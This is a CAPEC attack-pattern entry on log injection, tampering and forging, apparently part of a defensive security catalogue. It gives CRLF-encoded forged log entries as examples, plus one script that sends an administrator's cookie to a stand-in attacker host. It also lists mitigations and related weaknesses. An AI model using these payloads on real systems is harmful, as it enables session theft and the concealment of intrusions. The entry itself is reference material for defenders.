Log Injection-Tampering-Forging
Attack Pattern ID: 93 (Standard Attack Pattern Completeness: Complete)Typical Severity: HighStatus: Draft
+ Description

Summary

This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accoutability, non-repudiation and incident forensics capability.

Attack Execution Flow

Explore
  1. Determine Application's Log File Format:

    The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    Determine logging utility being used by application (e.g. log4j)

    env-All
    2

    Gain access to application's source code to determine log file formats.

    env-All
    3

    Install or obtain access to instance of application and observe its log file format.

    env-All

    Outcomes

    IDtypeOutcome Description
    1Success
    Attacker determines log file format used by application.
    2Inconclusive
    Attacker cannot conclusively determine log file format; he/she can only guess what the format is.
Exploit
  1. Manipulate Log Files:

    The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

    Attack Step Techniques

    IDAttack Step Technique DescriptionEnvironments
    1

    Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example: "%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in" may add the following forged entry into a log file: "[Thu Nov 12 12:11:22]:Info: User admin logged in". Different applications may require different encodings of the carriage return and line feed characters.

    env-All
    2

    Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain <script>new Image().src="http://xss.attacker.com/log_cookie?cookie="+encodeURI(document.cookie);</script>. The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).

    env-All

    Outcomes

    IDtypeOutcome Description
    1Success
    Forged entry or other malicious data inserted into application's logs.
    2Failure
    No entry inserted into logs, or the entry is visibly distinguishable from real entries.

    Security Controls

    IDtypeSecurity Control Description
    1Preventative
    Input validation to ensure that only legal characters supplied by users can be entered into log files
    2Preventative
    Encode information from user such that any unexpected characters are encoded safely before they are entered into log files.
    3Preventative
    Post-processing of log files to remove or encode dangerous characters before displaying to a user may help in some cases. It will not help remove fake log entries entered using carriage return and line feed characters, however.
+ Attack Prerequisites

The target host is logging the action and data of the user.

The target host insufficiently protects acces to the logs or loggin mechanisms.

+ Typical Likelihood of Exploit

Likelihood: High

+ Methods of Attack
  • Analysis
  • Modification of Resources
  • Injection
+ Examples-Instances

Description

Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php.

Related Vulnerabilities

CVE-2006-0201

Description

If a user submits the string "twenty-one" for val, the following entry is logged: INFO: Failed to parse val=twenty-one However, if an attacker submits the string "twenty-one%0a%0aINFO:+User+logged+out%3dbadguy", the following entry is logged: INFO: Failed to parse val=twenty-one INFO: User logged out=badguy Clearly, attackers can use this same mechanism to insert arbitrary log entries. (Source: CWE Log forging)

+ Attacker Skills or Knowledge Required

Skill or Knowledge Level: Low

This attack can be as simple as adding extra characters to the logged data (e.g. unsername). Adding entries is typically easier than removing entries.

Skill or Knowledge Level: Medium

A more sophisticated attack can try to defeat the input validation mechanism.

+ Probing Techniques

The attacker will try to determine which data may be logged in case of a success or failure of a predetermined action such as authentication. Once that data has been identified, the attacker may try to craft malicious data to inject.

Vulnerability testing tool can be used to test the input validation mechanism.

+ Solutions and Mitigations

Carefully control access to physical log files.

Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data.

Use synchronization to control the flow of execution.

Use static analysis tools to identify log forging vulnerabilities.

Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.

+ Attack Motivation-Consequences
  • Data Modification
+ Injection Vector

The variable being logged

+ Payload

The malicious characters or the crafted data which should forge the log entry.

+ Activation Zone

The logging mechanism (This can be as simple as writing to a file, logging API, etc.)

+ Payload Activation Impact

Log tampering or forgery (misleading data)

+ Related Weaknesses
CWE-IDWeakness NameWeakness Relationship Type
117Improper Output Sanitization for LogsTargeted
92DEPRECATED: Improper Sanitization of Custom Special CharactersSecondary
150Improper Neutralization of Escape, Meta, or Control SequencesSecondary
713OWASP Top Ten 2007 Category A2 - Injection FlawsTargeted
+ Related Attack Patterns
NatureTypeIDNameDescriptionView(s) this relationship pertains toView\(s\)
ChildOfAttack PatternAttack Pattern268Audit Log Manipulation 
Mechanism of Attack (primary)1000
ParentOfAttack PatternAttack Pattern106Cross Site Scripting through Log Files

Log injection attack pattern is one of the components of the current attack pattern

Mechanism of Attack1000
+ Related Security Principles
  • Reluctance to Trust

+ Purposes
  • Obfuscation
+ CIA Impact
Confidentiality Impact: MediumIntegrity Impact: HighAvailability Impact: High
+ Technical Context
Architectural Paradigms
All
Frameworks
All
Platforms
All
Languages
All
+ References

J. Viega and G. McGraw. Building Secure Software. Addison-Wesley, 2002.

CWE - Log Forging

A. Muffet. The night the log was forged. http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_capec.php?name=CAPEC-05

Secure Software - Log Injection : http://www.owasp.org/index.php/Log_injection

Samate test case on Log Forging : http://samate.nist.gov/SRD/view_testcase.php?login=Guest&tID=1579

+ Content History
Submissions
SubmitterOrganizationDateComments
Sean BarnumCigital, Inc.2007-03-25Identified priority for pattern creation
Modifications
ModifierOrganizationDateComments
Eric DalciCigital, Inc.2007-03-25Fleshed out content for pattern
Sean BarnumCigital, Inc2007-04-16Review and revise
Amit SethiCigital, Inc.2007-10-29Added extended Attack Execution Flow